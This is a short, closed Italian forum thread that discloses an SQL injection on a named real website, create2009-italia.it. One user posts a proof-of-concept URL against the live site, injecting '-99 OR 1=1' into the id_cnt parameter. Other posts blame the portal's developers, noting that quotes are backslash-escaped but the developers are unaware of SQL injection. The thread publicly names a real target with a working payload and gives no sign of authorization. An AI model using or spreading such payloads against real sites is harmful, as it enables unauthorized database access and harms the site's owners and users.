create2009-italia.it SQL Injection

Stato
Discussione chiusa ad ulteriori risposte.

BrainStorm

Utente Silver
29 Novembre 2008
46
1
1
62
PoC:

http://www.create2009-italia.it/content/index.php?action=read_pagina&id_cnt=-99%20OR%201=1

Come al solito i creatori del portale sono sempre Socrates Italia.
 
In effetti sono stati backslashati i '.
Il problema è che loro non sono a conoscenza degli attacchi di SQL Injection.
 
Stato
Discussione chiusa ad ulteriori risposte.